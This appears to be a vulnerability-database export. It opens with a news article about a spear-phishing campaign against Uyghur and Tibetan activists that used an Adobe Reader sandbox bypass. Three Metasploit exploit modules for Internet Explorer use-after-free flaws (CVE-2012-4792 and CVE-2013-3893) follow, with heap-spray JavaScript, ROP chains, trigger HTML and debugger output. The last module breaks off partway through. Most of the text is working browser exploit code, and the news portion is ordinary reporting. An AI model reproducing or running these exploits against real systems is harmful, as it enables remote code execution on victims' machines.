"bulletinFamily": "info", "description": "Attackers with a control infrastructure based in China are leveraging the same vulnerability exploited by [Miniduke](<threatpost.com/en_us/blogs/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713>) to attack Uyghur and Tibetan activists with new exploits.\n\nResearchers at Kaspersky Lab and AlienVault discovered a spear phishing campaign targeting non-governmental activists with PDF files rigged to exploit [CVE-2013-0640](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0640>), the [first confirmed sandbox bypass for Adobe Reader](<https://threatpost.com/adobe-investigating-reports-reader-zero-day-exploit-021313/>).\n\nThe malicious PDFs pretend to be a New Year\u2019s party invitation and an authorization form requesting some sort of reimbursement for a Tibetan activist group. Once executed, a dropper lands on the victim\u2019s machine and communicates with the command and control server located in the Shandong province of China. From there, the C&amp;C server installs a remote access Trojan on the compromised machine.\n\n\u201c[The RAT] lets [the attacker] access the victim\u2019s system to do virtually everything they want: stealing documents, uploading more malware,\u201d said AlienVault Labs manager Jaime Blasco. \u201cAnd of course, they can upload new modules to expand the functionalities if they require more.\u201d\n\nWhile this campaign exploits the same flaw in Adobe Reader as MiniDuke\u2014the [vulnerability was patched](<http://www.adobe.com/support/security/bulletins/apsb13-07.html>) Feb. 20\u2014there are differences in the two attacks[. MiniDuke was used primarily against government agencies in Europe](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/03/22110148/themysteryofthepdf0-dayassemblermicrobackdoor.pdf>), and relied on steganography to hide backdoor code, and on Twitter posts to connect to servers hosting backdoor code. While these new attacks also concentrate on stealing data, part of the malware is signed with a [compromised certificate](<http://blogs.norman.com/2011/security-research/invisible-ynk-a-code-signing-conundrum>) and the location of the C2 server also differs from Miniduke.\n\n\u201cBased on the exploit code and the payloads that are being used in the attack, it is clear that the group is a different one,\u201d Blasco said. \u201cAlso the infrastructure is completely different and the modus operandi is very close to a few campaigns we have tracked in the past that were targeting mainly NGOs and other activists outside China.\u201d\n\nThe Uyghur, much like the Tibetans, have been a frequent target for attackers inside of China. Espionage campaigns targeting the Turkic ethnic group have been escalating in recent weeks and have followed a similar pattern. In mid-February, a spear phishing campaign was spotted targeting the group with malicious Microsoft Word documents that exploited a buffer overflow vulnerability discovered and patched in 2009. Attacks against Mac OS X users were also detected last summer that would give attackers remote control of Mac computers in order to access and steal files.\n\nIn this campaign, the same group appears to be targeting the Uyghur and Tibetans simultaneously; Kaspersky Lab senior security researcher Costin Raiu said the connection could be a human rights conference taking place this week in Geneva.\n\n\u201cIt is not that rare [both are targeted together], but it is true that most of the times they use different campaigns to target different groups,\u201d Blasco said. \u201cIn the past, we also found similar patterns across campaigns targeting both Uyghur and Tibet people.\u201d\n\nResearchers found three different filenames for the PDF exploits: 2013-Yilliq Noruz Bayram Merikisige Teklip.pdf; \u8054\u540d\u4fe1.pdf; and arp.pdf. Raiu and Blasco said the Javascript code inside the PDFs resembles MiniDuke, minus some of the initial variables and obfuscation.\n\nThe malware dropped by the PDFs is detected by Kaspersky as Trojan.Win32.Agent.hwoo and .hwop. The dropper creates an executable in a local file called AcroRd32.exe; when that file executes, it drops a small backdoor that connects to the command and control at 60[.]211[.]253[.]28. Both domains connect to that IP address which was registered by the same party located in Shandong. The data-stealing part of the payload is detected as [Trojan.Win32.Swisyn](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FSwisyn.K>).\n\nWhile these attacks seem to be pretty rudimentary espionage-type campaigns, it quickly adopted new capabilities such as the sandbox-bypass vulnerability.\n\n\u201cDue to this advanced capability, it is extremely valuable to any attacker,\u201d Kaspersky\u2019s Raiu said. \u201cAlthough it was probably developed for (or by) use of a nation state originally, we now see it being copied and reused by other threat actors. This is becoming a common procedure nowadays and we can expect more such piggybacking or exploit stealing in the future.\u201d\n", "modified": "2018-03-22T15:01:51", "published": "2013-03-14T16:06:31", "id": "THREATPOST:25B894F4D6E2F383F6DFAD86A27454B8", "href": "https://threatpost.com/new-attacks-leverage-adobe-sandbox-bypass-against-uyghur-activists-031413/77627/", "type": "threatpost", "title": "New Attacks Leverage Adobe Sandbox Bypass Against Uyghur Activists", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:52", "bulletinFamily": "exploit", "description": "", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "PACKETSTORM:119168", "href": "https://packetstormsecurity.com/files/119168/Microsoft-Internet-Explorer-CDwnBindInfo-Object-Use-After-Free.html", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free", "type": "packetstorm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. A \nuse-after-free condition occurs when a CButton object is freed, but a reference \nis kept and used again during a page reload, an invalid memory that's controllable \nis used, and allows arbitrary code execution under the context of the user. \n \nPlease note: This vulnerability has been exploited in the wild targeting \nmainly China/Taiwan/and US-based computers. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'eromang', \n'mahmud ab rahman', \n'juan vazquez', \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-4792' ], \n[ 'US-CERT-VU', '154201' ], \n[ 'BID', '57070' ], \n[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], \n[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], \n[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] \n], \n'Payload' => \n{ \n'Space' => 980, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 \n], \n'Privileged' => false, \n'DisclosureDate' => \"Dec 27 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '5.2' \nos_name = 'Windows Server 2003' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nelse \n# OS not supported \nreturn nil \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0b30 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \n=begin \nStack Pivoting to eax: \n0:008> db eax \n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n=end \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nif t.name =~ /Windows XP/ \nstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret \nstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) \nelse \nstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret \nstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) \nend \nelse \nprint_status(\"Using JRE ROP\") \nstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret \nstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \n \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \n \nhtml = %Q| \n<!doctype html> \n<html> \n<head> \n<script> \n#{js} \n \nfunction exploit() \n{ \nvar e0 = null; \nvar e1 = null; \nvar e2 = null; \nvar arrObject = new Array(3000); \nvar elmObject = new Array(500); \nfor (var i = 0; i < arrObject.length; i++) \n{ \narrObject[i] = document.createElement('div'); \narrObject[i].className = unescape(\"ababababababababababababababababababababa\"); \n} \n \nfor (var i = 0; i < arrObject.length; i += 2) \n{ \narrObject[i].className = null; \n} \n \nCollectGarbage(); \n \nfor (var i = 0; i < elmObject.length; i ++) \n{ \nelmObject[i] = document.createElement('button'); \n} \n \nfor (var i = 1; i < arrObject.length; i += 2) \n{ \narrObject[i].className = null; \n} \n \nCollectGarbage(); \n \ntry { \ne0 = document.getElementById(\"a\"); \ne1 = document.getElementById(\"b\"); \ne2 = document.createElement(\"q\"); \ne1.applyElement(e2); \ne1.appendChild(document.createElement('button')); \ne1.applyElement(e0); \ne2.outerText = \"\"; \ne2.appendChild(document.createElement('body')); \n} catch(e) { } \nCollectGarbage(); \nfor(var i =0; i < 20; i++) \n{ \narrObject[i].className = unescape(\"ababababababababababababababababababababa\"); \n} \nvar eip = window; \nvar data = \"#{Rex::Text.rand_text_alpha(41)}\"; \neip.location = unescape(\"%u0b30%u0c0c\" + data); \n \n} \n \n</script> \n</head> \n<body onload=\"eval(exploit())\"> \n<form id=\"a\"> \n</form> \n<dfn id=\"b\"> \n</dfn> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n \n=begin \n(87c.f40): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=???????? \n0:008> k \nChildEBP RetAddr \n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 \n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 \n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f \n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 \n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb \n020bfd78 7e418734 mshtml!GlobalWndProc+0x183 \n020bfda4 7e418816 USER32!InternalCallWinProc+0x28 \n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 \n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 \n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf \n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 \n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 \n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab \n020bffec 00000000 kernel32!BaseThreadStart+0x37 \n \n0:008> r \neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? \n \n=end`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119168/ie_cdwnbindinfo_uaf.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:21:02", "bulletinFamily": "exploit", "description": "", "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "href": "https://packetstormsecurity.com/files/119186/Microsoft-Internet-Explorer-CButton-Object-Use-After-Free.html", "id": "PACKETSTORM:119186", "type": "packetstorm", "title": "Microsoft Internet Explorer CButton Object Use-After-Free", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. A \nuse-after-free condition occurs when a CButton object is freed, but a reference \nis kept and used again during a page reload, an invalid memory that's controllable \nis used, and allows arbitrary code execution under the context of the user. \n \nPlease note: This vulnerability has been exploited in the wild targeting \nmainly China/Taiwan/and US-based computers. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'eromang', \n'mahmud ab rahman', \n'juan vazquez', \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-4792' ], \n[ 'US-CERT-VU', '154201' ], \n[ 'BID', '57070' ], \n[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], \n[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], \n[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] \n], \n'Payload' => \n{ \n'Space' => 980, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 \n], \n'Privileged' => false, \n'DisclosureDate' => \"Dec 27 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '5.2' \nos_name = 'Windows Server 2003' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nelse \n# OS not supported \nreturn nil \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0b30 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \n=begin \nStack Pivoting to eax: \n0:008> db eax \n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n=end \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nif t.name =~ /Windows XP/ \nstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret \nstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) \nelse \nstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret \nstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) \nend \nelse \nprint_status(\"Using JRE ROP\") \nstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret \nstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \n \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \n \nhtml = %Q| \n<!doctype html> \n<html> \n<head> \n<script> \n#{js} \n \nfunction helloWorld() \n{ \nvar e0 = null; \nvar e1 = null; \nvar e2 = null; \n \ntry { \ne0 = document.getElementById(\"a\"); \ne1 = document.getElementById(\"b\"); \ne2 = document.createElement(\"q\"); \ne1.applyElement(e2); \ne1.appendChild(document.createElement('button')); \ne1.applyElement(e0); \ne2.outerText = \"\"; \ne2.appendChild(document.createElement('body')); \n} catch(e) { } \nCollectGarbage(); \nvar eip = window; \nvar data = \"#{Rex::Text.rand_text_alpha(41)}\"; \neip.location = unescape(\"%u0b30%u0c0c\" + data); \n} \n \n</script> \n</head> \n<body onload=\"eval(helloWorld())\"> \n<form id=\"a\"> \n</form> \n<dfn id=\"b\"> \n</dfn> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n \n=begin \n(87c.f40): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=???????? \n0:008> k \nChildEBP RetAddr \n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 \n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 \n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f \n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 \n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb \n020bfd78 7e418734 mshtml!GlobalWndProc+0x183 \n020bfda4 7e418816 USER32!InternalCallWinProc+0x28 \n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 \n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 \n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf \n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 \n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 \n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab \n020bffec 00000000 kernel32!BaseThreadStart+0x37 \n \n0:008> r \neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? \n \n=end`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119186/ie_cbutton_uaf.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:25:17", "bulletinFamily": "exploit", "description": "", "modified": "2013-09-30T00:00:00", "published": "2013-09-30T00:00:00", "href": "https://packetstormsecurity.com/files/123457/Microsoft-Internet-Explorer-SetMouseCapture-Use-After-Free.html", "id": "PACKETSTORM:123457", "type": "packetstorm", "title": "Microsoft Internet Explorer SetMouseCapture Use-After-Free", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Micorosft Internet Explorer SetMouseCapture Use-After-Free\", \n'Description' => %q{ \nThis module exploits a use-after-free vulnerability that currents targets Internet \nExplorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. \nIt was initially found in the wild in Japan, but other regions such as English, \nChinese, Korean, etc, were targeted as well. \n \nThe vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a \nreference during an event. An attacker first can setup two elements, where the second \nis the child of the first, and then setup a onlosecapture event handler for the parent \nelement. The onlosecapture event seems to require two setCapture() calls to trigger, \none for the parent element, one for the child. When the setCapture() call for the child \nelement is called, it finally triggers the event, which allows the attacker to cause an \narbitrary memory release using document.write(), which in particular frees up a 0x54-byte \nmemory. The exact size of this memory may differ based on the version of IE. After the \nfree, an invalid reference will still be kept and pass on to more functions, eventuall \nthis arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary \ncode execution) when this function attempts to use this reference to call what appears to \nbe a PrivateQueryInterface due to the offset (0x00). \n \nTo mimic the same exploit found in the wild, this module will try to use the same DLL \nfrom Microsoft Office 2007 or 2010 to leverage the attack. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Exploit in the wild first spotted in Japan \n'sinn3r' # Metasploit (thx binjo for the heads up!) \n], \n'References' => \n[ \n[ 'CVE', '2013-3893' ], \n[ 'OSVDB', '97380' ], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ] \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\x80\\xc7\\xfe\\xff\" # add esp, -80000 \n}, \n'DefaultOptions' => \n{ \n'PrependMigrate' => true, \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Privileged' => false, \n'DisclosureDate' => \"Sep 17 2013\", \n'DefaultTarget' => 0)) \nend \n \ndef is_win7_ie9?(agent) \n(agent =~ /MSIE 9/ and agent =~ /Windows NT 6\\.1/) \nend \n \ndef get_preq_html(cli, req) \n%Q| \n<html> \n<script> \nfunction getDLL() { \nvar checka = 0; \nvar checkb = 0; \n \ntry { \nchecka = new ActiveXObject(\"SharePoint.OpenDocuments.4\"); \n} catch (e) {} \n \ntry { \ncheckb = new ActiveXObject(\"SharePoint.OpenDocuments.3\"); \n} catch (e) {} \n \nif ((typeof checka) == \"object\" && (typeof checkb) == \"object\") { \nreturn \"office2010\"; \n} \nelse if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") { \nreturn \"office2007\"; \n} \n \nreturn \"na\"; \n} \n \nwindow.onload = function() { \ndocument.location = \"#{get_resource}/#{@exploit_page}?dll=\" + getDLL(); \n} \n</script> \n</html> \n| \nend \n \ndef junk \nreturn rand_text_alpha(4).unpack(\"V\")[0].to_i \nend \n \ndef get_payload(rop_dll) \ncode = payload.encoded \nrop = '' \np = '' \n \ncase rop_dll \nwhen :office2007 \nrop = \n[ \njunk, # 